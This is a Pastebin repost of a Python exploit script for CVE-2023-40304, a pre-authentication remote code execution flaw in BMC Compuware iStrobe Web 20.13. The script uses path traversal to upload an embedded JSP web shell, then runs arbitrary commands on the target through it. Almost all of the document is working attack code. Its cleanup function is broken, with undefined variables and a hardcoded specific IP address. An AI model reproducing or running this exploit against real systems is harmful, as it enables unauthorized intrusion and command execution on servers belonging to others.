Advertisement
FlyFar

BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE - CVE-2023-40304

Apr 18th, 2024
685
-1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.29 KB | Cybersecurity | 0 1
  1. #!/usr/bin/env python3
  2.  
  3. # Exploit Title: Pre-auth RCE on Compuware iStrobe Web
  4. # Date: 01-08-2023
  5. # Exploit Author: trancap
  6. # Vendor Homepage: https://www.bmc.com/
  7. # Version: BMC Compuware iStrobe Web - 20.13
  8. # Tested on: zOS# CVE : CVE-2023-40304
  9. # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)
  10. # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.
  11.  
  12. import requests
  13. import urllib.parse
  14. import argparse
  15. import sys
  16.  
  17. def upload_web_shell(url):
  18.   data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@
  19. page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process
  20. p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader
  21. stdInput = new BufferedReader(new
  22. InputStreamReader(p.getInputStream()));BufferedReader stdError = new
  23. BufferedReader(new InputStreamReader(p.getErrorStream()));String
  24. s=\"\";while((s=stdInput.readLine()) !=
  25. null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=
  26. null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}
  27.   # If encoded, the web shell will not be uploaded properly
  28.   data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')
  29.  
  30.   # Checking if web shell already uploaded
  31.   r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)
  32.   if r.status_code != 404:
  33.     return
  34.  
  35.   r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,
  36. verify=False)
  37.  
  38.   if r.status_code == 200:
  39.     print(f"[+] Successfully uploaded web shell, it should be
  40. accessible at {url}/istrobe/jsp/userhelp/ws.jsp")
  41.   else:
  42.     sys.exit("[-] Something went wrong while uploading the web shell")
  43.  
  44. def delete_web_shell(url):
  45.   paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}
  46.   response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",
  47. data=paramsPost, headers=headers, cookies=cookies)
  48.  
  49.   if r.status_code == 200:
  50.     print(f"[+] Successfully deleted web shell")
  51.   else:
  52.     sys.exit("[-] Something went wrong while deleting the web shell")
  53.  
  54. def run_cmd(url, cmd):
  55.   data = f"cmd={cmd}"
  56.   r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,
  57. verify=False)
  58.  
  59.   if r.status_code == 200:
  60.     print(r.text)
  61.   else:
  62.     sys.exit(f'[-] Something went wrong while executing "{cmd}" command')
  63.  
  64. parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')
  65. parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')
  66. parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')
  67. parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')
  68. args = parser.parse_args()
  69.  
  70. upload_web_shell(args.url)
  71. run_cmd(args.url, args.cmd)
  72.  
  73. if args.rm:
  74.   delete_web_shell(args.url)
  75.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement